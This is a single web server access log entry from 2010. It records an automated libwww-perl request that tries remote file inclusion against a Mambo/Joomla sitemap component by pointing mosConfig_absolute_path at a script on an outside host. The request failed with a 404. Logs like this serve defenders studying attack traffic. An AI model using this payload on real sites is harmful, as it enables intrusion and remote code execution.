200.226.134.29 - - [08/Feb/2010:01:25:42 -0800] "GET /logs/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
